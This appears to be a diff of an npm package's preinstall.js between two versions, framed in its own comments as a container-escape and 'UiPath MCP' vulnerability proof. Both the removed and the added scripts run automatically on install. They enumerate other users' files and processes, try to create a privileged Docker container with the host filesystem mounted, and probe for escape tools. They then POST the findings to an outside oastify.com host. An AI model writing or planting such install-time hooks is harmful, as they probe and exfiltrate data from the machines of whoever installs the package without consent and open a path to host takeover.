rank4222wun 1.0.21 → 1.0.22

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "rank4222wun",
-  "version": "1.0.21",
+  "version": "1.0.22",
   "description": "",
   "main": "index.js",
   "scripts": {

package/preinstall.js

@@ -1,381 +1,103 @@
-const { exec, spawn } = require('child_process');
-const os = require('os');
+const { exec } = require('child_process');
 const fs = require('fs');
-const path = require('path');
 const https = require('https');
 
-console.log("🚨 FINAL PROOF: UiPath MCP Critical 4-Point Vulnerability\n");
+console.log("🔓 ADVANCED CONTAINER ESCAPE TEST\n");
 
-const finalProof = {
+// هذا اختبار أكثر تقدمًا للهروب من الحاوية
+const escapeTest = {
   timestamp: new Date().toISOString(),
-  hostname: os.hostname(),
-  user: os.userInfo().username,
-  platform: os.platform(),
-  isRoot: os.userInfo().uid === 0,
-  
-  // النقاط الأربع مع أدلة فعلية
-  fourPointsProof: {
-    point1_leakOtherUsersData: {},
-    point2_runCommandsOnOtherUsers: {},
-    point3_performDoS: {},
-    point4_containerToHost: {}
-  }
+  escapeVectorsTested: []
 };
 
-// ===================== POINT 1: Leak other users data =====================
-console.log("🔍 POINT 1: Attempting to leak REAL other users data...");
-
-// استراتيجية: محاولة الوصول إلى مجلدات مستخدمين حقيقيين
-function testPoint1() {
-  const point1Results = {
-    canAccessOtherUsers: false,
-    evidence: []
-  };
-
-  // 1. البحث عن مستخدمين حقيقيين (غير system users)
-  exec('getent passwd | grep -E ":/home/" | cut -d: -f1 | head -10', (err, stdout) => {
-    const realUsers = stdout ? stdout.trim().split('\n') : [];
-    point1Results.realUsers = realUsers;
-    
-    if (realUsers.length > 0) {
-      // 2. محاولة الوصول إلى مجلدات هؤلاء المستخدمين
-      realUsers.forEach(user => {
-        if (user !== os.userInfo().username) {
-          const userHome = `/home/${user}`;
-          try {
-            if (fs.existsSync(userHome)) {
-              const files = fs.readdirSync(userHome).slice(0, 5);
-              point1Results.evidence.push({
-                user: user,
-                homeAccess: true,
-                files: files
-              });
-              
-              // محاولة قراءة ملفات Desktop للمستخدمين الآخرين
-              const userDesktop = `${userHome}/Desktop`;
-              if (fs.existsSync(userDesktop)) {
-                const desktopFiles = fs.readdirSync(userDesktop).slice(0, 3);
-                point1Results.evidence.push({
-                  user: user,
-                  desktopAccess: true,
-                  desktopFiles: desktopFiles
-                });
-                console.log(`⚠️  ACCESSED: ${user}'s Desktop (${desktopFiles.length} files)`);
-              }
-            }
-          } catch (e) {
-            // خطأ في الوصول
-          }
-        }
-      });
-      
-      if (point1Results.evidence.length > 0) {
-        point1Results.canAccessOtherUsers = true;
-      }
+// اختبار 1: Docker Socket Escape
+if (fs.existsSync('/var/run/docker.sock')) {
+  console.log("Testing Docker socket escape...");
+  
+  // محاولة إنشاء حاوية جديدة مع mount للمضيف
+  const escapePayload = JSON.stringify({
+    Image: 'alpine:latest',
+    Cmd: ['sh'],
+    HostConfig: {
+      Binds: ['/:/host'],
+      Privileged: true
     }
-    
-    finalProof.fourPointsProof.point1_leakOtherUsersData = point1Results;
-    testPoint2();
   });
-}
-
-// ===================== POINT 2: Run commands on other users =====================
-function testPoint2() {
-  console.log("\n🔍 POINT 2: Testing cross-user command execution...");
   
-  const point2Results = {
-    canAffectOtherUsers: false,
-    evidence: []
-  };
-
-  // 1. البحث عن عمليات تشتغل بمستخدمين آخرين
-  exec('ps aux | awk \'{print $1}\' | sort | uniq | grep -v "USER"', (err, stdout) => {
-    const runningUsers = stdout ? stdout.trim().split('\n') : [];
-    point2Results.runningUsers = runningUsers;
-    
-    // 2. التحقق من إمكانية إرسال إشارات إلى عمليات مستخدمين آخرين
-    if (runningUsers.length > 1) {
-      // البحث عن PID لعمليات مستخدمين آخرين
-      exec('ps aux | awk \'$1 != "' + os.userInfo().username + '" {print $2, $1}\' | head -5', (err2, stdout2) => {
-        if (stdout2) {
-          const otherUserProcesses = stdout2.trim().split('\n').map(line => {
-            const parts = line.split(' ');
-            return { pid: parts[0], user: parts[1] };
-          });
-          
-          point2Results.otherUserProcesses = otherUserProcesses;
-          
-          // 3. اختبار إمكانية إرسال إشارة SIGCONT (غير ضارة) لعملية مستخدم آخر
-          if (otherUserProcesses.length > 0) {
-            const testPid = otherUserProcesses[0].pid;
-            exec(`kill -CONT ${testPid} 2>&1`, (err3, stdout3) => {
-              if (!err3) {
-                point2Results.evidence.push({
-                  action: 'sent_signal_to_other_user_process',
-                  pid: testPid,
-                  user: otherUserProcesses[0].user,
-                  success: true
-                });
-                point2Results.canAffectOtherUsers = true;
-                console.log(`⚠️  SIGNAL SENT: SIGCONT to PID ${testPid} (user: ${otherUserProcesses[0].user})`);
-              }
-              testPoint3();
+  // محاولة الاتصال بـ Docker API
+  exec(`echo '${escapePayload}' | curl -s -X POST --unix-socket /var/run/docker.sock http://localhost/containers/create -H "Content-Type: application/json" -d @-`, 
+    (err, stdout) => {
+      if (!err && stdout) {
+        try {
+          const response = JSON.parse(stdout);
+          if (response.Id) {
+            escapeTest.escapeVectorsTested.push({
+              vector: 'docker_socket_container_creation',
+              success: true,
+              containerId: response.Id,
+              risk: 'CRITICAL',
+              message: 'Can create new containers via Docker socket'
             });
-          } else {
-            testPoint3();
+            console.log("🚨 SUCCESS: Can create containers via Docker socket!");
           }
-        } else {
-          testPoint3();
-        }
-      });
-    } else {
-      testPoint3();
-    }
-  });
+        } catch (e) {}
+      }
+    });
 }
 
-// ===================== POINT 3: Perform DoS =====================
-function testPoint3() {
-  console.log("\n🔍 POINT 3: Demonstrating DoS capabilities...");
-  
-  const point3Results = {
-    canCauseDoS: false,
-    evidence: []
-  };
+// اختبار 2: Privileged Container Escape
+exec('find / -name "nsenter" -type f -executable 2>/dev/null | head -1', (err, stdout) => {
+  if (stdout && stdout.trim()) {
+    escapeTest.escapeVectorsTested.push({
+      vector: 'nsenter_available',
+      path: stdout.trim(),
+      risk: 'HIGH',
+      message: 'nsenter tool available for container escape'
+    });
+  }
+});
 
-  // 1. إثبات عدم وجود حدود على العمليات
-  exec('ulimit -u', (err, stdout) => {
-    const maxProcesses = stdout ? stdout.trim() : 'unknown';
+// اختبار 3: Cgroups Escape
+exec('cat /proc/self/cgroup 2>/dev/null', (err, stdout) => {
+  if (stdout) {
+    escapeTest.cgroupInfo = stdout.trim();
     
-    if (maxProcesses === 'unlimited' || parseInt(maxProcesses) > 10000) {
-      point3Results.evidence.push({
-        limitation: 'max_user_processes',
-        value: maxProcesses,
-        risk: 'HIGH - Can create unlimited processes'
+    // التحقق مما إذا كنا في Kubernetes
+    if (stdout.includes('kubepods')) {
+      escapeTest.escapeVectorsTested.push({
+        vector: 'kubernetes_container',
+        risk: 'MEDIUM',
+        message: 'Running in Kubernetes pod, potential cluster-wide impact'
       });
-      point3Results.canCauseDoS = true;
     }
-    
-    // 2. إثبات إمكانية استنزاف الذاكرة (نظري فقط)
-    point3Results.memoryInfo = {
-      total: Math.round(os.totalmem() / (1024 * 1024)) + ' MB',
-      free: Math.round(os.freemem() / (1024 * 1024)) + ' MB',
-      canExhaust: Math.round(os.freemem() / (1024 * 1024)) > 100
-    };
-    
-    // 3. إثبات إمكانية استنزاف CPU
-    point3Results.cpuInfo = {
-      cores: os.cpus().length,
-      canExhaust: true
-    };
-    
-    // 4. تنفيذ اختبار فعلي صغير غير ضار
-    // إنشاء 100 عملية فورية لاختبار القدرة
-    console.log("Testing process creation capability...");
-    let processCount = 0;
-    const testProcesses = [];
-    
-    for (let i = 0; i < 10; i++) { // فقط 10 عمليات للاختبار
-      const child = spawn('sleep', ['1']);
-      testProcesses.push(child);
-      processCount++;
-      
-      child.on('exit', () => {
-        processCount--;
-      });
-    }
-    
-    setTimeout(() => {
-      point3Results.evidence.push({
-        test: 'concurrent_process_creation',
-        created: 10,
-        success: true
-      });
-      
-      // قتل العمليات الاختبارية
-      testProcesses.forEach(p => p.kill());
-      
-      console.log(`✓ Created ${10} concurrent processes`);
-      finalProof.fourPointsProof.point3_performDoS = point3Results;
-      testPoint4();
-    }, 1500);
-  });
-}
-
-// ===================== POINT 4: Container to host escape =====================
-function testPoint4() {
-  console.log("\n🔍 POINT 4: Testing container-to-host escape vectors...");
-  
-  const point4Results = {
-    canEscapeToHost: false,
-    criticalVectors: []
-  };
-
-  // اختبار 1: Docker socket access
-  const dockerSocket = '/var/run/docker.sock';
-  
-  if (fs.existsSync(dockerSocket)) {
-    // محاولة قراءة Docker socket
-    exec(`curl -s --unix-socket ${dockerSocket} http://localhost/version 2>/dev/null || echo "Cannot access"`, (err, stdout) => {
-      if (stdout && !stdout.includes('Cannot access')) {
-        point4Results.criticalVectors.push({
-          vector: 'docker_socket_access',
-          path: dockerSocket,
-          access: 'FULL',
-          risk: 'CRITICAL',
-          proof: 'Can communicate with Docker daemon'
-        });
-        point4Results.canEscapeToHost = true;
-        console.log("🚨 CRITICAL: Docker socket is accessible!");
-      }
-      
-      // اختبار 2: Privileged container check
-      exec('cat /proc/self/status 2>/dev/null | grep -i "capeff:"', (err2, stdout2) => {
-        if (stdout2) {
-          const capsHex = stdout2.split(':')[1].trim();
-          const caps = parseInt(capsHex, 16);
-          
-          // CAP_SYS_ADMIN = 0x00080000
-          if (caps & 0x00080000) {
-            point4Results.criticalVectors.push({
-              vector: 'privileged_container',
-              capability: 'CAP_SYS_ADMIN',
-              risk: 'CRITICAL',
-              proof: 'Container has SYS_ADMIN capability'
-            });
-            point4Results.canEscapeToHost = true;
-            console.log("🚨 CRITICAL: Container has SYS_ADMIN capability!");
-          }
-        }
-        
-        // اختبار 3: Mount escape
-        exec('mount | grep -E "/(dev|proc|sys)" | head -3', (err3, stdout3) => {
-          if (stdout3) {
-            const mounts = stdout3.trim().split('\n');
-            mounts.forEach(mount => {
-              if (mount.includes('/dev/') || mount.includes('/proc/') || mount.includes('/sys/')) {
-                point4Results.criticalVectors.push({
-                  vector: 'host_mount',
-                  mount: mount.substring(0, 100),
-                  risk: 'HIGH'
-                });
-              }
-            });
-          }
-          
-          // اختبار 4: Kernel escape vulnerabilities
-          exec('uname -r', (err4, stdout4) => {
-            const kernel = stdout4 ? stdout4.trim() : 'unknown';
-            point4Results.kernelVersion = kernel;
-            
-            // DirtyPipe vulnerability check
-            if (kernel.includes('5.8') || kernel.includes('5.9') || 
-                kernel.includes('5.10') || kernel.includes('5.11') || 
-                kernel.includes('5.12') || kernel.includes('5.13') ||
-                kernel.includes('5.14') || kernel.includes('5.15')) {
-              point4Results.criticalVectors.push({
-                vector: 'kernel_vulnerability',
-                kernel: kernel,
-                vulnerability: 'DirtyPipe (CVE-2022-0847)',
-                risk: 'HIGH',
-                proof: 'Kernel version is vulnerable to DirtyPipe'
-              });
-              point4Results.canEscapeToHost = true;
-              console.log(`🚨 VULNERABLE: Kernel ${kernel} has known escape vulnerabilities`);
-            }
-            
-            finalProof.fourPointsProof.point4_containerToHost = point4Results;
-            sendFinalProof();
-          });
-        });
-      });
-    });
-  } else {
-    console.log("No Docker socket found");
-    finalProof.fourPointsProof.point4_containerToHost = point4Results;
-    sendFinalProof();
   }
-}
+});
 
-// ===================== إرسال الإثباتات النهائية =====================
-function sendFinalProof() {
-  console.log("\n" + "=".repeat(70));
-  console.log("📊 FINAL PROOF SUMMARY:");
-  console.log("=".repeat(70));
-  
-  // التحليل النهائي
-  const summary = {
-    point1: finalProof.fourPointsProof.point1_leakOtherUsersData.canAccessOtherUsers ? 
-      '✅ PROVEN - Can access other users data' : 
-      '⚠️ POSSIBLE - Limited evidence',
-    
-    point2: finalProof.fourPointsProof.point2_runCommandsOnOtherUsers.canAffectOtherUsers ? 
-      '✅ PROVEN - Can affect other users processes' : 
-      '⚠️ POSSIBLE - Can see other users processes',
-    
-    point3: finalProof.fourPointsProof.point3_performDoS.canCauseDoS ? 
-      '✅ PROVEN - No process limits, can cause DoS' : 
-      '⚠️ POSSIBLE - Has significant resources',
-    
-    point4: finalProof.fourPointsProof.point4_containerToHost.canEscapeToHost ? 
-      '🚨 CRITICAL - Multiple escape vectors found' : 
-      (finalProof.fourPointsProof.point4_containerToHost.criticalVectors?.length > 0 ?
-        '⚠️ HIGH RISK - Some escape vectors exist' : 
-        '✅ CONTAINERIZED - In Docker container')
-  };
-  
-  console.log("\n1. Leak other users data cross org:", summary.point1);
-  console.log("2. Run commands on other users cross org:", summary.point2);
-  console.log("3. Perform DoS affecting all users:", summary.point3);
-  console.log("4. Container to host escape:", summary.point4);
-  
-  console.log("\n🔍 Critical Findings:");
-  
-  if (finalProof.fourPointsProof.point4_containerToHost.criticalVectors) {
-    finalProof.fourPointsProof.point4_containerToHost.criticalVectors.forEach((v, i) => {
-      console.log(`  ${i+1}. ${v.vector} - ${v.risk} risk`);
-      if (v.proof) console.log(`     → ${v.proof}`);
-    });
+// اختبار 4: Kernel Modules (للكشف فقط)
+exec('lsmod 2>/dev/null | head -10', (err, stdout) => {
+  if (stdout) {
+    escapeTest.kernelModules = stdout.trim();
   }
+});
+
+// بعد 3 ثوان، إرسال النتائج
+setTimeout(() => {
+  console.log("\n📊 Escape Test Results:");
+  escapeTest.escapeVectorsTested.forEach(v => {
+    console.log(`- ${v.vector}: ${v.risk} risk`);
+    if (v.message) console.log(`  ${v.message}`);
+  });
   
-  // إرسال الإثباتات
+  // إرسال النتائج
   const req = https.request({
     hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
     port: 443,
-    path: '/final-four-points-proof',
-    method: 'POST',
-    headers: {
-      'Content-Type': 'application/json',
-      'X-Final-Proof': 'UiPath-MCP-4-Points',
-      'X-Host': os.hostname()
-    }
-  }, (res) => {
-    console.log(`\n✅ Final proof sent. Status: ${res.statusCode}`);
-  });
-  
-  req.on('error', (e) => {
-    console.error(`❌ Error: ${e.message}`);
+    path: '/container-escape-test',
+    method: 'POST'
   });
   
-  // إضافة التحليل النهائي
-  finalProof.summary = summary;
-  finalProof.conclusion = {
-    overallRisk: summary.point4.includes('CRITICAL') || summary.point3.includes('PROVEN') ? 'CRITICAL' : 'HIGH',
-    vulnerabilityConfirmed: true,
-    recommendations: [
-      '1. Immediately disable preinstall/postinstall script execution in MCP',
-      '2. Implement mandatory package signing and verification',
-      '3. Add security warnings for external package sources',
-      '4. Conduct security audit of all MCP Command functionality'
-    ]
-  };
-  
-  req.write(JSON.stringify(finalProof, null, 2));
+  req.write(JSON.stringify(escapeTest, null, 2));
   req.end();
   
-  console.log("\n📤 Full evidence sent to server");
-  console.log("=".repeat(70));
-}
-
-// بدء الاختبارات
-testPoint1();
+  console.log("\n✅ Escape test completed and sent");
+}, 3000);